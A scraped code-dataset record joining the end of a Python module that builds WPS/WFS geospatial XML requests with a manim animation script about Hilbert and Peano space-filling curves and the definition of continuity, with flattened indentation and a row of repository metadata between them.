# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
queryElement = etree.Element(
nspath_eval('wfs:Query', namespaces), attrib={"typeName": self.typeName})
for propertyName in self.propertyNames:
propertyNameElement = etree.SubElement(
queryElement, nspath_eval('wfs:PropertyName', namespaces))
propertyNameElement.text = propertyName
if len(self.filters) > 0:
filterElement = etree.SubElement(
queryElement, nspath_eval('ogc:Filter', namespaces))
for filter in self.filters:
# gmlObjectIdElement
etree.SubElement(
filterElement, nspath_eval('ogc:GmlObjectId', namespaces),
attrib={nspath_eval('gml:id', namespaces): filter})
return queryElement
class GMLMultiPolygonFeatureCollection(FeatureCollection):
'''
Class that represents a FeatureCollection defined as a GML multi-polygon.
'''
def __init__(self, polygons):
'''
Initializer accepts an array of polygons, where each polygon is an array of (lat,lon) tuples.
Example: polygons = [ [(-102.8184, 39.5273), (-102.8184, 37.418), (-101.2363, 37.418), (-101.2363, 39.5273), (-102.8184, 39.5273)], # noqa
[(-92.8184, 39.5273), (-92.8184, 37.418), (-91.2363, 37.418), (-91.2363, 39.5273), (-92.8184, 39.5273)] ]
'''
self.polygons = polygons
def getXml(self):
'''
<wps:Data>
<wps:ComplexData mimeType="text/xml" encoding="UTF-8"
schema="http://schemas.opengis.net/gml/3.1.1/base/feature.xsd">
<gml:featureMembers xmlns:ogc="http://www.opengis.net/ogc"
xmlns:draw="gov.usgs.cida.gdp.draw" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:ows="http://www.opengis.net/ows" xmlns:gml="http://www.opengis.net/gml"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="gov.usgs.cida.gdp.draw http://cida.usgs.gov/climate/derivative/xsd/draw.xsd"> # noqa
<gml:box gml:id="box.1">
<gml:the_geom>
<gml:MultiPolygon srsDimension="2"
srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">
<gml:polygonMember>
<gml:Polygon>
<gml:exterior>
<gml:LinearRing>
<gml:posList>-102.8184 39.5273 -102.8184 37.418 -101.2363 37.418 -101.2363 39.5273 -102.8184 39.5273</gml:posList>
</gml:LinearRing>
</gml:exterior>
</gml:Polygon>
</gml:polygonMember>
</gml:MultiPolygon>
</gml:the_geom>
<gml:ID>0</gml:ID>
</gml:box>
</gml:featureMembers>
</wps:ComplexData>
</wps:Data>
'''
dataElement = etree.Element(nspath_eval('wps:Data', namespaces))
complexDataElement = etree.SubElement(
dataElement, nspath_eval('wps:ComplexData', namespaces),
attrib={"mimeType": "text/xml", "schema": GML_SCHEMA_LOCATION})
featureMembersElement = etree.SubElement(
complexDataElement, nspath_eval('gml:featureMembers', namespaces),
attrib={nspath_eval("xsi:schemaLocation", namespaces): "%s %s" % (DRAW_NAMESPACE, DRAW_SCHEMA_LOCATION)})
boxElement = etree.SubElement(featureMembersElement, nspath_eval(
'gml:box', namespaces), attrib={nspath_eval("gml:id", namespaces): "box.1"})
geomElement = etree.SubElement(
boxElement, nspath_eval('gml:the_geom', namespaces))
multiPolygonElement = etree.SubElement(
geomElement, nspath_eval('gml:MultiPolygon', namespaces),
attrib={"srsDimension": "2", "srsName": "http://www.opengis.net/gml/srs/epsg.xml#4326"})
for polygon in self.polygons:
polygonMemberElement = etree.SubElement(
multiPolygonElement, nspath_eval('gml:polygonMember', namespaces))
polygonElement = etree.SubElement(
polygonMemberElement, nspath_eval('gml:Polygon', namespaces))
exteriorElement = etree.SubElement(
polygonElement, nspath_eval('gml:exterior', namespaces))
linearRingElement = etree.SubElement(
exteriorElement, nspath_eval('gml:LinearRing', namespaces))
posListElement = etree.SubElement(
linearRingElement, nspath_eval('gml:posList', namespaces))
posListElement.text = ' '.join(
["%s %s" % (x, y) for x, y in polygon[:]])
idElement = etree.SubElement(
boxElement, nspath_eval('gml:ID', namespaces))
idElement.text = "0"
return dataElement
def monitorExecution(execution, sleepSecs=3, download=False, filepath=None):
'''
Convenience method to monitor the status of a WPS execution till it completes (succesfully or not),
and write the output to file after a succesfull job completion.
:param execution: WPSExecution instance
:param int sleepSecs: number of seconds to sleep in between check status invocations
:param download: True to download the output when the process terminates, False otherwise
:param filepath: optional path to output file (if downloaded=True), otherwise filepath
will be inferred from response document
'''
while execution.isComplete() is False:
execution.checkStatus(sleepSecs=sleepSecs)
log.info('Execution status: %s' % execution.status)
if execution.isSucceded():
if download:
execution.getOutput(filepath=filepath)
else:
for output in execution.processOutputs:
if output.reference is not None:
log.info('Output URL=%s' % output.reference)
else:
for ex in execution.errors:
log.error('Error: code=%s, locator=%s, text=%s' %
(ex.code, ex.locator, ex.text))
def printValue(value):
'''
Utility method to format a value for printing.
'''
# ComplexData type
if isinstance(value, ComplexData):
return "mimeType=%s, encoding=%s, schema=%s" % (value.mimeType, value.encoding, value.schema)
# other type
else:
return value
def printInputOutput(value, indent=''):
'''
Utility method to inspect an input/output element.
'''
# InputOutput fields
print(('{} identifier={}, title={}, abstract={}, data type={}'.format(
indent, value.identifier, value.title, value.abstract, value.dataType)))
for val in value.allowedValues:
print(('{} Allowed Value: {}'.format(indent, printValue(val))))
if value.anyValue:
print(' Any value allowed')
for val in value.supportedValues:
print(('{} Supported Value: {}'.format(indent, printValue(val))))
print(('{} Default Value: {} '.format(indent, printValue(value.defaultValue))))
# Input fields
if isinstance(value, Input):
print(('{} minOccurs={}, maxOccurs={}'.format(
indent, value.minOccurs, value.maxOccurs)))
# Output fields
if isinstance(value, Output):
print(('{} reference={}, mimeType={}'.format(
indent, value.reference, value.mimeType)))
for datum in value.data:
print(('{} Data Value: {}'.format(indent, printValue(datum))))
| 41.615946
| 846
| 0.596486
|
39424911686758463fc441efb68a58d69c144675
| 32,583
|
py
|
Python
|
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from manim2.imports import *
import displayer as disp
from hilbert.curves import \
TransformOverIncreasingOrders, FlowSnake, HilbertCurve, \
SnakeCurve, PeanoCurve
from hilbert.section1 import get_mathy_and_bubble
from scipy.spatial.distance import cdist
def get_time_line():
length = 2.6*FRAME_WIDTH
year_range = 400
time_line = NumberLine(
numerical_radius = year_range/2,
unit_length_to_spatial_width = length/year_range,
tick_frequency = 10,
leftmost_tick = 1720,
number_at_center = 1870,
numbers_with_elongated_ticks = list(range(1700, 2100, 100))
)
time_line.sort_points(lambda p : p[0])
time_line.set_color_by_gradient(
PeanoCurve.CONFIG["start_color"],
PeanoCurve.CONFIG["end_color"]
)
time_line.add_numbers(
2020, *list(range(1800, 2050, 50))
)
return time_line
class SectionTwo(Scene):
def construct(self):
self.add(TextMobject("Section 2: Filling space"))
self.wait()
class HilbertCurveIsPerfect(Scene):
def construct(self):
curve = HilbertCurve(order = 6)
curve.set_color(WHITE)
colored_curve = curve.copy()
colored_curve.thin_out(3)
lion = ImageMobject("lion", invert = False)
lion.replace(curve, stretch = True)
sparce_lion = lion.copy()
sparce_lion.thin_out(100)
distance_matrix = cdist(colored_curve.points, sparce_lion.points)
closest_point_indices = np.apply_along_axis(
np.argmin, 1, distance_matrix
)
colored_curve.rgbas = sparce_lion.rgbas[closest_point_indices]
line = Line(5*LEFT, 5*RIGHT)
Mobject.align_data(line, colored_curve)
line.rgbas = colored_curve.rgbas
self.add(lion)
self.play(ShowCreation(curve, run_time = 3))
self.play(
FadeOut(lion),
Transform(curve, colored_curve),
run_time = 3
)
self.wait()
self.play(Transform(curve, line, run_time = 5))
self.wait()
class AskMathematicianFriend(Scene):
def construct(self):
mathy, bubble = get_mathy_and_bubble()
bubble.sort_points(lambda p : np.dot(p, UP+RIGHT))
self.add(mathy)
self.wait()
self.play(ApplyMethod(
mathy.blink,
rate_func = squish_rate_func(there_and_back)
))
self.wait()
self.play(ShowCreation(bubble))
self.wait()
self.play(
ApplyMethod(mathy.shift, 3*(DOWN+LEFT)),
ApplyPointwiseFunction(
lambda p : 15*p/get_norm(p),
bubble
),
run_time = 3
)
class TimeLineAboutSpaceFilling(Scene):
def construct(self):
curve = PeanoCurve(order = 5)
curve.stretch_to_fit_width(FRAME_WIDTH)
curve.stretch_to_fit_height(FRAME_HEIGHT)
curve_start = curve.copy()
curve_start.apply_over_attr_arrays(
lambda arr : arr[:200]
)
time_line = get_time_line()
time_line.shift(-time_line.number_to_point(2000))
self.add(time_line)
self.play(ApplyMethod(
time_line.shift,
-time_line.number_to_point(1900),
run_time = 3
))
brace = Brace(
Mobject(
Point(time_line.number_to_point(1865)),
Point(time_line.number_to_point(1888)),
),
UP
)
words = TextMobject("""
Cantor drives himself (and the \\\\
mathematical community at large) \\\\
crazy with research on infinity.
""")
words.next_to(brace, UP)
self.play(
GrowFromCenter(brace),
ShimmerIn(words)
)
self.wait()
self.play(
Transform(time_line, curve_start),
FadeOut(brace),
FadeOut(words)
)
self.play(ShowCreation(
curve,
run_time = 5,
rate_func=linear
))
self.wait()
class NotPixelatedSpace(Scene):
def construct(self):
grid = Grid(64, 64)
space_region = Region()
space_mobject = MobjectFromRegion(space_region, DARK_GREY)
curve = PeanoCurve(order = 5).replace(space_mobject)
line = Line(5*LEFT, 5*RIGHT)
line.set_color_by_gradient(curve.start_color, curve.end_color)
for mob in grid, space_mobject:
mob.sort_points(get_norm)
infinitely = TextMobject("Infinitely")
detailed = TextMobject("detailed")
extending = TextMobject("extending")
detailed.next_to(infinitely, RIGHT)
extending.next_to(infinitely, RIGHT)
Mobject(extending, infinitely, detailed).center()
arrows = Mobject(*[
Arrow(2*p, 4*p)
for theta in np.arange(np.pi/6, 2*np.pi, np.pi/3)
for p in [rotate_vector(RIGHT, theta)]
])
self.add(grid)
self.wait()
self.play(Transform(grid, space_mobject, run_time = 5))
self.remove(grid)
self.set_color_region(space_region, DARK_GREY)
self.wait()
self.add(infinitely, detailed)
self.wait()
self.play(DelayByOrder(Transform(detailed, extending)))
self.play(ShowCreation(arrows))
self.wait()
self.clear()
self.set_color_region(space_region, DARK_GREY)
self.play(ShowCreation(line))
self.play(Transform(line, curve, run_time = 5))
class HistoryOfDiscover(Scene):
def construct(self):
time_line = get_time_line()
time_line.shift(-time_line.number_to_point(1900))
hilbert_curve = HilbertCurve(order = 3)
peano_curve = PeanoCurve(order = 2)
for curve in hilbert_curve, peano_curve:
curve.scale(0.5)
hilbert_curve.to_corner(DOWN+RIGHT)
peano_curve.to_corner(UP+LEFT)
squares = Mobject(*[
Square(side_length=3, color=WHITE).replace(curve)
for curve in (hilbert_curve, peano_curve)
])
self.add(time_line)
self.wait()
for year, curve, vect, text in [
(1890, peano_curve, UP, "Peano Curve"),
(1891, hilbert_curve, DOWN, "Hilbert Curve"),
]:
point = time_line.number_to_point(year)
point[1] = 0.2
arrow = Arrow(point+2*vect, point, buff = 0.1)
arrow.set_color_by_gradient(curve.start_color, curve.end_color)
year_mob = TexMobject(str(year))
year_mob.next_to(arrow, vect)
words = TextMobject(text)
words.next_to(year_mob, vect)
self.play(
ShowCreation(arrow),
ShimmerIn(year_mob),
ShimmerIn(words)
)
self.play(ShowCreation(curve))
self.wait()
self.play(ShowCreation(squares))
self.wait()
self.play(ApplyMethod(
Mobject(*self.mobjects).shift, 20*(DOWN+RIGHT)
))
class DefinitionOfCurve(Scene):
def construct(self):
start_words = TextMobject([
"``", "Space Filling", "Curve ''",
]).to_edge(TOP, buff = 0.25)
quote, space_filling, curve_quote = start_words.copy().split()
curve_quote.shift(
space_filling.get_left()-\
curve_quote.get_left()
)
space_filling = Point(space_filling.get_center())
end_words = Mobject(*[
quote, space_filling, curve_quote
]).center().to_edge(TOP, buff = 0.25)
space_filling_fractal = TextMobject("""
``Space Filling Fractal''
""").to_edge(UP)
curve = HilbertCurve(order = 2).shift(DOWN)
fine_curve = HilbertCurve(order = 8)
fine_curve.replace(curve)
dots = Mobject(*[
Dot(
curve.points[n*curve.get_num_points()/15],
color = YELLOW_C
)
for n in range(1, 15)
if n not in [4, 11]
])
start_words.shift(2*(UP+LEFT))
self.play(
ApplyMethod(start_words.shift, 2*(DOWN+RIGHT))
)
self.wait()
self.play(Transform(start_words, end_words))
self.wait()
self.play(ShowCreation(curve))
self.wait()
self.play(ShowCreation(
dots,
run_time = 3,
))
self.wait()
self.clear()
self.play(ShowCreation(fine_curve, run_time = 5))
self.wait()
self.play(ShimmerIn(space_filling_fractal))
self.wait()
class PseudoHilbertCurvesDontFillSpace(Scene):
def construct(self):
curve = HilbertCurve(order = 1)
grid = Grid(2, 2, stroke_width=1)
self.add(grid, curve)
for order in range(2, 6):
self.wait()
new_grid = Grid(2**order, 2**order, stroke_width=1)
self.play(
ShowCreation(new_grid),
Animation(curve)
)
self.remove(grid)
grid = new_grid
self.play(Transform(
curve, HilbertCurve(order = order)
))
square = Square(side_length = 6, color = WHITE)
square.corner = Mobject1D()
square.corner.add_line(3*DOWN, ORIGIN)
square.corner.add_line(ORIGIN, 3*RIGHT)
square.digest_mobject_attrs()
square.scale(2**(-5))
square.corner.set_color(
Color(rgb = curve.rgbas[curve.get_num_points()/3])
)
square.shift(
grid.get_corner(UP+LEFT)-\
square.get_corner(UP+LEFT)
)
self.wait()
self.play(
FadeOut(grid),
FadeOut(curve),
FadeIn(square)
)
self.play(
ApplyMethod(square.replace, grid)
)
self.wait()
class HilbertCurveIsLimit(Scene):
def construct(self):
mathy, bubble = get_mathy_and_bubble()
bubble.write(
"A Hilbert curve is the \\\\ limit of all these \\dots"
)
self.add(mathy, bubble)
self.play(ShimmerIn(bubble.content))
self.wait()
class DefiningCurves(Scene):
def construct(self):
words = TextMobject(
["One does not simply define the limit \\\\ \
of a sequence of","curves","\\dots"]
)
top_words = TextMobject([
"curves", "are functions"
]).to_edge(UP)
curves1 = words.split()[1]
curves2 = top_words.split()[0]
words.ingest_submobjects()
number = TexMobject("0.27")
pair = TexMobject("(0.53, 0.02)")
pair.next_to(number, buff = 2)
arrow = Arrow(number, pair)
Mobject(number, arrow, pair).center().shift(UP)
number_line = UnitInterval()
number_line.stretch_to_fit_width(5)
number_line.to_edge(LEFT).shift(DOWN)
grid = Grid(4, 4).scale(0.4)
grid.next_to(number_line, buff = 2)
low_arrow = Arrow(number_line, grid)
self.play(ShimmerIn(words))
self.wait()
self.play(
FadeOut(words),
ApplyMethod(curves1.replace, curves2),
ShimmerIn(top_words.split()[1])
)
self.wait()
self.play(FadeIn(number))
self.play(ShowCreation(arrow))
self.play(FadeIn(pair))
self.wait()
self.play(ShowCreation(number_line))
self.play(ShowCreation(low_arrow))
self.play(ShowCreation(grid))
self.wait()
class PseudoHilbertCurveAsFunctionExample(Scene):
args_list = [(2,), (3,)]
# For subclasses to turn args in the above
# list into stings which can be appended to the name
@staticmethod
def args_to_string(order):
return "Order%d"%order
@staticmethod
def string_to_args(order_str):
return int(order_str)
def construct(self, order):
if order == 2:
result_tex = "(0.125, 0.75)"
elif order == 3:
result_tex = "(0.0758, 0.6875)"
phc, arg, result = TexMobject([
"\\text{PHC}_%d"%order,
"(0.3)",
"= %s"%result_tex
]).to_edge(UP).split()
function = TextMobject("Function", size = "\\normal")
function.shift(phc.get_center()+DOWN+2*LEFT)
function_arrow = Arrow(function, phc)
line = Line(5*LEFT, 5*RIGHT)
curve = HilbertCurve(order = order)
line.match_colors(curve)
grid = Grid(2**order, 2**order)
grid.fade()
for mob in curve, grid:
mob.scale(0.7)
index = int(0.3*line.get_num_points())
dot1 = Dot(line.points[index])
arrow1 = Arrow(arg, dot1, buff = 0.1)
dot2 = Dot(curve.points[index])
arrow2 = Arrow(result.get_bottom(), dot2, buff = 0.1)
self.add(phc)
self.play(
ShimmerIn(function),
ShowCreation(function_arrow)
)
self.wait()
self.remove(function_arrow, function)
self.play(ShowCreation(line))
self.wait()
self.play(
ShimmerIn(arg),
ShowCreation(arrow1),
ShowCreation(dot1)
)
self.wait()
self.remove(arrow1)
self.play(
FadeIn(grid),
Transform(line, curve),
Transform(dot1, dot2),
run_time = 2
)
self.wait()
self.play(
ShimmerIn(result),
ShowCreation(arrow2)
)
self.wait()
class ContinuityRequired(Scene):
def construct(self):
words = TextMobject([
"A function must be",
"\\emph{continuous}",
"if it is to represent a curve."
])
words.split()[1].set_color(YELLOW_C)
self.add(words)
self.wait()
class FormalDefinitionOfContinuity(Scene):
def construct(self):
self.setup()
self.label_spaces()
self.move_dot()
self.label_jump()
self.draw_circles()
self.vary_circle_sizes()
self.discontinuous_point()
def setup(self):
self.input_color = YELLOW_C
self.output_color = RED
def spiril(t):
theta = 2*np.pi*t
return t*np.cos(theta)*RIGHT+t*np.sin(theta)*UP
self.spiril1 = ParametricFunction(
lambda t : 1.5*RIGHT + DOWN + 2*spiril(t),
density = 5*DEFAULT_POINT_DENSITY_1D,
)
self.spiril2 = ParametricFunction(
lambda t : 5.5*RIGHT + UP - 2*spiril(1-t),
density = 5*DEFAULT_POINT_DENSITY_1D,
)
Mobject.align_data(self.spiril1, self.spiril2)
self.output = Mobject(self.spiril1, self.spiril2)
self.output.ingest_submobjects()
self.output.set_color(GREEN_A)
self.interval = UnitInterval()
self.interval.set_width(FRAME_X_RADIUS-1)
self.interval.to_edge(LEFT)
self.input_dot = Dot(color = self.input_color)
self.output_dot = self.input_dot.copy().set_color(self.output_color)
left, right = self.interval.get_left(), self.interval.get_right()
self.input_homotopy = lambda x_y_z_t : (x_y_z_t[0], x_y_z_t[1], x_y_z_t[3]) + interpolate(left, right, x_y_z_t[3])
output_size = self.output.get_num_points()-1
output_points = self.output.points
self.output_homotopy = lambda x_y_z_t1 : (x_y_z_t1[0], x_y_z_t1[1], x_y_z_t1[2]) + output_points[int(x_y_z_t1[3]*output_size)]
def get_circles_and_points(self, min_input, max_input):
input_left, input_right = [
self.interval.number_to_point(num)
for num in (min_input, max_input)
]
input_circle = Circle(
radius = get_norm(input_left-input_right)/2,
color = WHITE
)
input_circle.shift((input_left+input_right)/2)
input_points = Line(
input_left, input_right,
color = self.input_color
)
output_points = Mobject(color = self.output_color)
n = self.output.get_num_points()
output_points.add_points(
self.output.points[int(min_input*n):int(max_input*n)]
)
output_center = output_points.points[int(0.5*output_points.get_num_points())]
max_distance = get_norm(output_center-output_points.points[-1])
output_circle = Circle(
radius = max_distance,
color = WHITE
)
output_circle.shift(output_center)
return (
input_circle,
input_points,
output_circle,
output_points
)
def label_spaces(self):
input_space = TextMobject("Input Space")
input_space.to_edge(UP)
input_space.shift(LEFT*FRAME_X_RADIUS/2)
output_space = TextMobject("Output Space")
output_space.to_edge(UP)
output_space.shift(RIGHT*FRAME_X_RADIUS/2)
line = Line(
UP*FRAME_Y_RADIUS, DOWN*FRAME_Y_RADIUS,
color = WHITE
)
self.play(
ShimmerIn(input_space),
ShimmerIn(output_space),
ShowCreation(line),
ShowCreation(self.interval),
)
self.wait()
def move_dot(self):
kwargs = {
"rate_func" : None,
"run_time" : 3
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs),
ShowCreation(self.output, **kwargs)
)
self.wait()
def label_jump(self):
jump_points = Mobject(
Point(self.spiril1.points[-1]),
Point(self.spiril2.points[0])
)
self.brace = Brace(jump_points, RIGHT)
self.jump = TextMobject("Jump")
self.jump.next_to(self.brace, RIGHT)
self.play(
GrowFromCenter(self.brace),
ShimmerIn(self.jump)
)
self.wait()
self.remove(self.brace, self.jump)
def draw_circles(self):
input_value = 0.45
input_radius = 0.04
for dot in self.input_dot, self.output_dot:
dot.center()
kwargs = {
"rate_func" : lambda t : interpolate(1, input_value, smooth(t))
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs)
)
A, B = list(map(Mobject.get_center, [self.input_dot, self.output_dot]))
A_text = TextMobject("A")
A_text.shift(A+2*(LEFT+UP))
A_arrow = Arrow(
A_text, self.input_dot,
color = self.input_color
)
B_text = TextMobject("B")
B_text.shift(B+2*RIGHT+DOWN)
B_arrow = Arrow(
B_text, self.output_dot,
color = self.output_color
)
tup = self.get_circles_and_points(
input_value-input_radius,
input_value+input_radius
)
input_circle, input_points, output_circle, output_points = tup
for text, arrow in [(A_text, A_arrow), (B_text, B_arrow)]:
self.play(
ShimmerIn(text),
ShowCreation(arrow)
)
self.wait()
self.remove(A_text, A_arrow, B_text, B_arrow)
self.play(ShowCreation(input_circle))
self.wait()
self.play(ShowCreation(input_points))
self.wait()
input_points_copy = input_points.copy()
self.play(
Transform(input_points_copy, output_points),
run_time = 2
)
self.wait()
self.play(ShowCreation(output_circle))
self.wait()
self.wait()
self.remove(*[
input_circle, input_points,
output_circle, input_points_copy
])
def vary_circle_sizes(self):
input_value = 0.45
radius = 0.04
vary_circles = VaryCircles(
self, input_value, radius,
run_time = 5,
)
self.play(vary_circles)
self.wait()
text = TextMobject("Function is ``Continuous at A''")
text.shift(2*UP).to_edge(LEFT)
arrow = Arrow(text, self.input_dot)
self.play(
ShimmerIn(text),
ShowCreation(arrow)
)
self.wait()
self.remove(vary_circles.mobject, text, arrow)
def discontinuous_point(self):
point_description = TextMobject(
"Point where the function jumps"
)
point_description.shift(3*RIGHT)
discontinuous_at_A = TextMobject(
"``Discontinuous at A''",
size = "\\Large"
)
discontinuous_at_A.shift(2*UP).to_edge(LEFT)
text = TextMobject("""
Circle around ouput \\\\
points can never \\\\
be smaller than \\\\
the jump
""")
text.scale(0.75)
text.shift(3.5*RIGHT)
input_value = 0.5
input_radius = 0.04
vary_circles = VaryCircles(
self, input_value, input_radius,
run_time = 5,
)
for dot in self.input_dot, self.output_dot:
dot.center()
kwargs = {
"rate_func" : lambda t : interpolate(0.45, input_value, smooth(t))
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs)
)
discontinuous_arrow = Arrow(discontinuous_at_A, self.input_dot)
arrow = Arrow(
point_description, self.output_dot,
buff = 0.05,
color = self.output_color
)
self.play(
ShimmerIn(point_description),
ShowCreation(arrow)
)
self.wait()
self.remove(point_description, arrow)
tup = self.get_circles_and_points(
input_value-input_radius,
input_value+input_radius
)
input_circle, input_points, output_circle, output_points = tup
input_points_copy = input_points.copy()
self.play(ShowCreation(input_circle))
self.play(ShowCreation(input_points))
self.play(
Transform(input_points_copy, output_points),
run_time = 2
)
self.play(ShowCreation(output_circle))
self.wait()
self.play(ShimmerIn(text))
self.remove(input_circle, input_points, output_circle, input_points_copy)
self.play(vary_circles)
self.wait()
self.play(
ShimmerIn(discontinuous_at_A),
ShowCreation(discontinuous_arrow)
)
self.wait(3)
self.remove(vary_circles.mobject, discontinuous_at_A, discontinuous_arrow)
def continuous_point(self):
pass
class VaryCircles(Animation):
def __init__(self, scene, input_value, radius, **kwargs):
digest_locals(self)
Animation.__init__(self, Mobject(), **kwargs)
def interpolate_mobject(self, alpha):
radius = self.radius + 0.9*self.radius*np.sin(1.5*np.pi*alpha)
self.mobject = Mobject(*self.scene.get_circles_and_points(
self.input_value-radius,
self.input_value+radius
)).ingest_submobjects()
class FunctionIsContinuousText(Scene):
def construct(self):
all_points = TextMobject("$f$ is continuous at every input point")
continuous = TextMobject("$f$ is continuous")
all_points.shift(UP)
continuous.shift(DOWN)
arrow = Arrow(all_points, continuous)
self.play(ShimmerIn(all_points))
self.play(ShowCreation(arrow))
self.play(ShimmerIn(continuous))
self.wait()
class DefineActualHilbertCurveText(Scene):
def construct(self):
self.add(TextMobject("""
Finally define a Hilbert Curve\\dots
"""))
self.wait()
class ReliesOnWonderfulProperty(Scene):
def construct(self):
self.add(TextMobject("""
\\dots which relies on a certain property
of Pseudo-Hilbert-curves.
"""))
self.wait()
class WonderfulPropertyOfPseudoHilbertCurves(Scene):
def construct(self):
val = 0.3
text = TextMobject([
"PHC", "$_n", "(", "%3.1f"%val, ")$",
" has a ", "limit point ", "as $n \\to \\infty$"
])
func_parts = text.copy().split()[:5]
Mobject(*func_parts).center().to_edge(UP)
num_str, val_str = func_parts[1], func_parts[3]
curve = UnitInterval()
curve.sort_points(lambda p : p[0])
dot = Dot().shift(curve.number_to_point(val))
arrow = Arrow(val_str, dot, buff = 0.1)
curve.add_numbers(0, 1)
self.play(ShowCreation(curve))
self.play(
ShimmerIn(val_str),
ShowCreation(arrow),
ShowCreation(dot)
)
self.wait()
self.play(
FadeOut(arrow),
*[
FadeIn(func_parts[i])
for i in (0, 1, 2, 4)
]
)
for num in range(2,9):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dot = Dot(new_curve.points[int(val*new_curve.get_num_points())])
new_num_str = TexMobject(str(num)).replace(num_str)
self.play(
Transform(curve, new_curve),
Transform(dot, new_dot),
Transform(num_str, new_num_str)
)
self.wait()
text.to_edge(UP)
text_parts = text.split()
for index in 1, -1:
text_parts[index].set_color()
starters = Mobject(*func_parts + [
Point(mob.get_center(), stroke_width=1)
for mob in text_parts[5:]
])
self.play(Transform(starters, text))
arrow = Arrow(text_parts[-2].get_bottom(), dot, buff = 0.1)
self.play(ShowCreation(arrow))
self.wait()
class FollowManyPoints(Scene):
def construct(self):
text = TextMobject([
"PHC", "_n", "(", "x", ")$",
" has a limit point ", "as $n \\to \\infty$",
"\\\\ for all $x$"
])
parts = text.split()
parts[-1].next_to(Mobject(*parts[:-1]), DOWN)
parts[-1].set_color(BLUE)
parts[3].set_color(BLUE)
parts[1].set_color()
parts[-2].set_color()
text.to_edge(UP)
curve = UnitInterval()
curve.sort_points(lambda p : p[0])
vals = np.arange(0.1, 1, 0.1)
dots = Mobject(*[
Dot(curve.number_to_point(val))
for val in vals
])
curve.add_numbers(0, 1)
starter_dots = dots.copy().ingest_submobjects()
starter_dots.shift(2*UP)
self.add(curve, text)
self.wait()
self.play(DelayByOrder(ApplyMethod(starter_dots.shift, 2*DOWN)))
self.wait()
self.remove(starter_dots)
self.add(dots)
for num in range(1, 10):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dots = Mobject(*[
Dot(new_curve.points[int(val*new_curve.get_num_points())])
for val in vals
])
self.play(
Transform(curve, new_curve),
Transform(dots, new_dots),
)
# self.wait()
class FormalDefinitionOfHilbertCurve(Scene):
def construct(self):
val = 0.7
text = TexMobject([
"\\text{HC}(", "x", ")",
"=\\lim_{n \\to \\infty}\\text{PHC}_n(", "x", ")"
])
text.to_edge(UP)
x1 = text.split()[1]
x2 = text.split()[-2]
x2.set_color(BLUE)
explanation = TextMobject("Actual Hilbert curve function")
exp_arrow = Arrow(explanation, text.split()[0])
curve = UnitInterval()
dot = Dot(curve.number_to_point(val))
x_arrow = Arrow(x1.get_bottom(), dot, buff = 0)
curve.sort_points(lambda p : p[0])
curve.add_numbers(0, 1)
self.add(*text.split()[:3])
self.play(
ShimmerIn(explanation),
ShowCreation(exp_arrow)
)
self.wait()
self.remove(explanation, exp_arrow)
self.play(ShowCreation(curve))
self.play(
ApplyMethod(x1.set_color, BLUE),
ShowCreation(x_arrow),
ShowCreation(dot)
)
self.wait()
self.remove(x_arrow)
limit = Mobject(*text.split()[3:]).ingest_submobjects()
limit.stroke_width = 1
self.play(ShimmerIn(limit))
for num in range(1, 9):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dot = Dot(new_curve.points[int(val*new_curve.get_num_points())])
self.play(
Transform(curve, new_curve),
Transform(dot, new_dot),
)
class CouldNotDefineForSnakeCurve(Scene):
def construct(self):
self.add(TextMobject("""
You could not define a limit curve from
snake curves.
"""))
self.wait()
class ThreeThingsToProve(Scene):
def construct(self):
definition = TexMobject([
"\\text{HC}(", "x", ")",
"=\\lim_{n \\to \\infty}\\text{PHC}_n(", "x", ")"
])
definition.to_edge(UP)
definition.split()[1].set_color(BLUE)
definition.split()[-2].set_color(BLUE)
intro = TextMobject("Three things need to be proven")
prove_that = TextMobject("Prove that HC is $\\dots$")
prove_that.scale(0.7)
prove_that.to_edge(LEFT)
items = TextMobject([
"\\begin{enumerate}",
"\\item Well-defined: ",
"Points on Pseudo-Hilbert-curves really do converge",
"\\item A Curve: ",
"HC is continuous",
"\\item Space-filling: ",
"Each point in the unit square is an output of HC",
"\\end{enumerate}",
]).split()
items[1].set_color(GREEN)
items[3].set_color(YELLOW_C)
items[5].set_color(MAROON)
Mobject(*items).to_edge(RIGHT)
self.add(definition)
self.play(ShimmerIn(intro))
self.wait()
self.play(Transform(intro, prove_that))
for item in items[1:-1]:
self.play(ShimmerIn(item))
self.wait()
class TilingSpace(Scene):
def construct(self):
coords_set = [ORIGIN]
for n in range(int(FRAME_WIDTH)):
for vect in UP, RIGHT:
for k in range(n):
new_coords = coords_set[-1]+((-1)**n)*vect
coords_set.append(new_coords)
square = Square(side_length = 1, color = WHITE)
squares = Mobject(*[
square.copy().shift(coords)
for coords in coords_set
]).ingest_submobjects()
self.play(
DelayByOrder(FadeIn(squares)),
run_time = 3
)
curve = HilbertCurve(order = 6).scale(1./6)
all_curves = Mobject(*[
curve.copy().shift(coords)
for coords in coords_set
]).ingest_submobjects()
all_curves.thin_out(10)
self.play(ShowCreation(
all_curves,
rate_func=linear,
run_time = 15
))
class ColorIntervals(Scene):
def construct(self):
number_line = NumberLine(
numerical_radius = 5,
number_at_center = 5,
leftmost_tick = 0,
density = 2*DEFAULT_POINT_DENSITY_1D
)
number_line.shift(2*RIGHT)
number_line.add_numbers()
number_line.scale(2)
